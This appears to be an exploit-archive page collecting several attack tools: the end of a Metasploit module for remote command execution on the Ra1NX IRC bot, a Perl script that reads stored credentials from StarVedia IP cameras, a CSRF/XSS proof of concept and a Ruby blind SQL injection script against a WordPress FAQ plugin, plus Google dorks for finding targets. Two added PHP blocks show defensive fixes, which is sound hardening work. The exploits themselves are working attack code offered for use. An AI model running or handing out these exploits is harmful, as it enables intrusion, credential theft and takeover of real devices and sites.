		super(update_info(info,
			&#39;Name&#39;           =>  &#39;"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution&#39;,
			&#39;Description&#39;    =>  %q{
					This module allows remote command execution on the PHP IRC bot Ra1NX by
					using the public call feature in private message to covertly bypass the
					authentication system.
				},
			&#39;Author&#39;         => 
				[
					&#39;bwall  <bwall[at]openbwall.com> &#39; # Ra1NX analysis and Metasploit module
				],
			&#39;License&#39;        =>  MSF_LICENSE,
			&#39;References&#39;     => 
				[
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot&#39;],
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0&#39;],
					[&#39;URL&#39;, &#39;http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b&#39;]
				],
			&#39;Platform&#39;       =>  [ &#39;unix&#39;, &#39;win&#39;],
			&#39;Arch&#39;           =>  ARCH_CMD,
			&#39;Payload&#39;        => 
				{
					&#39;Space&#39;    =>  344,
					&#39;BadChars&#39; =>  &#39;&#39;,
					&#39;DisableNops&#39; =>  true,
					&#39;Compat&#39;      => 
						{
							&#39;PayloadType&#39; =>  &#39;cmd&#39;,
						}
				},
			&#39;Targets&#39;  => 
				[
					[ &#39;Ra1NX&#39;, { } ]
				],
			&#39;Privileged&#39;     =>  false,
			&#39;DisclosureDate&#39; =>  &#39;March 24 2013&#39;,
			&#39;DefaultTarget&#39;  =>  0))

		register_options(
			[
				Opt::RPORT(6667),
				OptString.new(&#39;IRC_PASSWORD&#39;, [false, &#39;IRC Connection Password&#39;, &#39;&#39;]),
				OptString.new(&#39;NICK&#39;, [true, &#39;IRC Nickname&#39;, &#39;msf_user&#39;]),
				OptString.new(&#39;RNICK&#39;, [true, &#39;Nickname of Target IRC Bot&#39;, &#39;jhl1&#39;]),
				OptString.new(&#39;PHP_EXEC&#39;, [true, &#39;Function used to call payload&#39;, &#39;system&#39;])
			], self.class)
	end

	def check
		connect

		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return Exploit::CheckCode::Unknown
		end
		confirm_string = rand_text_alpha(8)
		response = send_msg(sock, "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @msg #{datastore[&#39;NICK&#39;]} #{confirm_string}rn")
		print response
		quit(sock)
		disconnect

		if response =~ /#{confirm_string}/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def send_msg(sock, data)
		sock.put(data)
		data = ""
		begin
			read_data = sock.get_once(-1, 1)
			while not read_data.nil?
				data  < < read_data
				read_data = sock.get_once(-1, 1)
			end
		rescue EOFError
		end
		data
	end

	def register(sock)
		msg = ""

		if datastore[&#39;IRC_PASSWORD&#39;] and not datastore[&#39;IRC_PASSWORD&#39;].empty?
			msg  < < "PASS #{datastore[&#39;IRC_PASSWORD&#39;]}rn"
		end

		if datastore[&#39;NICK&#39;].length >  9
			nick = rand_text_alpha(9)
			print_error("The nick is longer than 9 characters, using #{nick}")
		else
			nick = datastore[&#39;NICK&#39;]
		end

		msg  < < "NICK #{nick}rn"
		msg  < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"

		response = send_msg(sock,msg)
		return response
	end

	def ra1nx_command(sock)
		encoded = payload.encoded
		command_msg = "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @#{datastore[&#39;PHP_EXEC&#39;]} #{encoded}rn"
		response = send_msg(sock, command_msg)
		return response
	end

	def quit(sock)
		quit_msg = "QUIT :bye bye\r\n"
		sock.put(quit_msg)
	end

	def exploit
		connect

		print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return
		end

		print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
		ra1nx_command(sock)

		quit(sock)
		disconnect
	end
end

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure

The Perl exploit for the StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure vulnerability is as follows.

#!/usr/bin/perl
#
#  [*] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit
#  Author: Todor Donev
#  Email: todor.donev at gmail dot com
#  Type: Hardware
#
#  Thanks to Tsvetelina Emirska the best friend in my life 
#  and all my other friends for the help and support which 
#  gives me. Kind regards to all of you, who read my lil' 
#  exploits.
#  Bulgaria, Sofia
#  03.2013
#
#  Shodanhq r0x 4 teh lulz!!
#  http://www.youtube.com/watch?v=qNyN1AY-YZQ  Cheeerzz =))
#
#  Another bug, hint: you can edit this code and add some lines for remote change the password.
#####

use LWP::Simple;
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
}
if ($type eq "-d") {
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulnerable, $!\n");
print " [*] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit\n";
print " [!] Exploiting: $t\n";
if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
$result .= "   [o] User: $1\n";
}else{die(" Try another exploit, $!");}
if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){
$result .= "   [o] Password: $1\n";
}else{die("Try another exploit or restart the exploit\n");}
sleep(1);
print " [\\m/] BINGO!!!\n\a".$result;
}
sub usg(){
print " [!] usg: perl $0 [-r or -d] <victim:port>\n";
print " [!]  -d: disclosure password option\n";
print " [!] exp: perl $0 -d 127.0.0.1 :)\n";
exit;
}

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Multiple Vulnerabilities

The exploit for the CSRF vulnerability found in WordPress IndiaNIC FAQs Manager Plugin 1.0 is as follows.

<html>
<!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patch (cli)


##############
# Description:
##############
# The IndiaNIC FAQ Settings Page is vulnerable to CSRF.
# The Ask Question area (front-end) is vulnerable to XSS. It is possible to insert <script>alert(1)</script> in the question parameter.
# The Captcha value can be read from the captcha parameter (hidden field)
#



###################################
#### Part of Ask Question form ####
###################################
<form action="" method="POST" name="iNICfaqsAskForm_1">
<input type="hidden" value="1" name="group_id">
<input type="hidden" value="1" name="from_user">
<input type="hidden" value="inic_faq_questions" name="action">
<input type="hidden" value="5540" name="captcha">     <=================== We don't need the captcha Image when we have this xD


####################################################################
#### Request from Ask Question area (XSS in question parameter) ####
####################################################################
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9001/wordpress/?p=11
Content-Length: 143
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala@gmail.com&question=XSS TEST <script>alert(1)</script> ?&captcha_code=8560

# When the admin navigates to the Question area (back-end), arbitrary JavaScript will execute.



#######################################################################
-->
	<title>Download</title>
<body>

	<!-- replace "127.0.0.1:9001/wordpress" -->
	<form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST">
	<input type="hidden" name="action" value="inic_faq_settings" />
	<input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" />
	<input type="hidden" name="capture_email" value="1" />
	<input type="hidden" name="notify_when_answered" value="1" />
	<input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" />
	<input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" />
	<input type="hidden" name="custom_js" value="alert(1234)" />
	</form>
	<script>document.forms[0].submit();</script>

</body>
</html>
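Both findings in this advisory come down to missing server-side checks: the settings action trusts any POST that reaches admin-ajax.php, and the submitted question is echoed unescaped into the back-end. The handler below is an added example written for this page, not the plugin's own code; the `inic_faq_settings` action and the field names come from the PoC above, while the nonce name, option key and helper function names are assumptions.

```php
<?php
// Added example, not the plugin's own code. Hardened handler for the
// `inic_faq_settings` action shown in the PoC; nonce name, option key and
// helper names are assumed for illustration.

add_action( 'wp_ajax_inic_faq_settings', 'inic_faq_settings_hardened' );

function inic_faq_post_field( $key ) {
    return isset( $_POST[ $key ] ) ? (string) $_POST[ $key ] : '';
}

function inic_faq_settings_hardened() {
    // CSRF: the auto-submitting form in the PoC can set every field, but it
    // cannot supply a nonce bound to the victim's session. Dies on mismatch.
    check_ajax_referer( 'inic_faq_settings_nonce', 'nonce' );

    // Authorisation: a logged-in low-privilege user must not change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges' );
    }

    // Only known fields, each sanitised for its type, are stored.
    $settings = array(
        'alert_email_address'  => sanitize_email( inic_faq_post_field( 'alert_email_address' ) ),
        'capture_email'        => '' === inic_faq_post_field( 'capture_email' ) ? 0 : 1,
        'notify_when_answered' => '' === inic_faq_post_field( 'notify_when_answered' ) ? 0 : 1,
        'listing_template'     => sanitize_text_field( inic_faq_post_field( 'listing_template' ) ),
        'custom_css'           => wp_strip_all_tags( inic_faq_post_field( 'custom_css' ) ),
    );
    // custom_js is not persisted in this example: a setting that injects
    // script into every page is exactly what the PoC's alert(1234) abuses.

    update_option( 'inic_faq_settings', $settings );
    wp_send_json_success( $settings );
}

// The legitimate settings form must emit the matching nonce field.
function inic_faq_settings_nonce_field() {
    wp_nonce_field( 'inic_faq_settings_nonce', 'nonce' );
}

// Stored XSS: escape the question and e-mail on output, so that
// <script>alert(1)</script> is displayed to the admin instead of executed.
function inic_faq_render_question_row( array $row ) {
    return '<tr><td>' . esc_html( $row['who_asked'] ) . '</td>'
         . '<td>' . esc_html( $row['question'] ) . '</td></tr>';
}
```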

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Blind SQL Injection

A Blind SQL Injection vulnerability has been found in WordPress IndiaNIC FAQs Manager Plugin 1.0; the exploit, with details of the vulnerability and where it occurs, is below.

# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patch (cli)

##############
# Description:
##############
# The "order" and "orderby" parameters are vulnerable to SQL Injection
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=inic_faq&orderby=<sqli>
# The PoC takes some time to finish (15min on my Testsystem).
# I could speed it up with Multithreading but I'm too lazy right now


#### Vulnerable code part (wp_list_table.php) ##############################################################
#
# function prepare_items() {
#  $this->_column_headers = array($this->_columns, $this->_hidden_columns, $this->_sortable_columns);
#  $sort_order = isset($_GET['order']) ? $_GET['order'] : "ASC";
#  $orderby_column = isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby']} {$sort_order}" : false;
#
#  global $wpdb;
#  if (is_array($this->_sql)) {
#    if ($orderby_column == false) {
#      $data = $this->_sql;
#    } else {
#      $data = $this->_sql;
#      usort($data, array(&$this, 'usort_reorder'));
#    }
#  } else {
#    $data = $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A);
#  }
################################################################################################################



#################################
#### Blind SQL Injection PoC ####
#################################
require "net/http"
require "uri"

$target = "" # EDIT ME #
$cookie = "" # EDIT ME # authenticated user session

# Example:
#$target = "http://127.0.0.1:9001/wordpress/"
#$cookie = "wordpress_a6a5d84619ae3f833460b386c064b9e5=admin|1364040545|86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=editor=html; wp-settings-time-1=1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=tony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=tony@bauer.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=http://sucker.de; wordpress_test_cookie=WP Cookie check; wordpress_logged_in_a6a5d84619ae3f833460b386c064b9e5=admin|1364040545|d7053b96adaa95745023b91694bf30ef; PHPSESSID=1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=1"

if $target.eql?("") or $cookie.eql?("")
    puts "\n[!]\tPlease set $target and $cookie variable\n"
    raise
end

$chars = ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
$hash = "$P$"
$i = 0 # chars index
$j = 4 # hash index


def sqli_send()
    sqli = URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$j}, 1)) FROM wp_users WHERE id = 1) = #{$chars[$i].ord}) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables)END) --")
    uri = URI.parse("#{$target}wp-admin/admin.php?page=inic_faq&orderby=#{sqli}")
    http = Net::HTTP.new(uri.host, uri.port)
    #http.set_debug_output($stderr)
    request = Net::HTTP::Get.new(uri.request_uri)
    request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0"
    request["Cookie"] = $cookie
    resp = http.request(request)
    if( resp.code != "200" )
        puts "something is wrong response = #{resp.code}"
        raise
    end
    # With WordPress default settings no SQL error is displayed,
    # but when an error appears we don't get any result.
    # The PoC searches for "No record found" and assumes there was an error
    return resp.body().match(/No record found/)
end

def print_status()
    output = "HASH: #{$hash} try #{$chars[$i]}"
    print "\b"*output.length + output
end

while( $hash.length < 34 )
    if( !sqli_send() )
        $hash += $chars[$i]
        $j += 1
        $i = 0
    else
        $i += 1
    end
    print_status()
end
puts "\n[*]\thave a nice day :-) \n"
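The root cause is in the quoted `prepare_items()`: `$_GET['orderby']` and `$_GET['order']` are interpolated straight into the `ORDER BY` clause, and since identifiers cannot be bound with `$wpdb->prepare()`, the fix is a whitelist rather than escaping. The class below is an added example for this page, not the plugin's code; it keeps the member names from the quoted snippet and assumes the class name, the default column, the base query and that `$this->_sortable_columns` is keyed by column slug.

```php
<?php
// Added example, not the plugin's code: hardened prepare_items() for the
// list table quoted above. Class name, default column, base query and the
// layout of $this->_sortable_columns (keys = column slugs) are assumed.
class Inic_Faq_List_Table_Hardened extends WP_List_Table {
    protected $_columns          = array();
    protected $_hidden_columns   = array();
    protected $_sortable_columns = array( 'id' => array( 'id', true ), 'question' => array( 'question', false ) );
    protected $_sql              = 'SELECT * FROM wp_inic_faq_questions'; // assumed base query
    private $orderby = 'id';
    private $order   = 'ASC';

    // Identifiers cannot be bound with $wpdb->prepare(), so map the request
    // onto a fixed list of column slugs and exactly two directions. Anything
    // else silently falls back to the defaults; no raw input reaches the SQL.
    private function resolve_order() {
        $allowed = array_keys( $this->_sortable_columns );
        $orderby = isset( $_GET['orderby'] ) ? sanitize_key( $_GET['orderby'] ) : '';
        $this->orderby = in_array( $orderby, $allowed, true ) ? $orderby : 'id';
        $order = isset( $_GET['order'] ) ? strtoupper( $_GET['order'] ) : 'ASC';
        $this->order = ( 'DESC' === $order ) ? 'DESC' : 'ASC';
    }

    public function prepare_items() {
        $this->_column_headers = array( $this->_columns, $this->_hidden_columns, $this->_sortable_columns );
        $this->resolve_order();
        $orderby_clause = sprintf( ' ORDER BY `%s` %s', $this->orderby, $this->order );

        global $wpdb;
        if ( is_array( $this->_sql ) ) {
            $data = $this->_sql;
            usort( $data, array( $this, 'usort_reorder' ) );
        } else {
            // The PoC's orderby=(CASE WHEN ... -- never gets this far: it is
            // not in $allowed, so the clause is built from 'id' instead.
            $data = $wpdb->get_results( "{$this->_sql}{$orderby_clause}", ARRAY_A );
        }
        $this->items = $data;
    }

    // Array-backed sources sort on the same whitelisted column and direction.
    public function usort_reorder( $a, $b ) {
        $cmp = strcmp( (string) $a[ $this->orderby ], (string) $b[ $this->orderby ] );
        return 'DESC' === $this->order ? -$cmp : $cmp;
    }
}
```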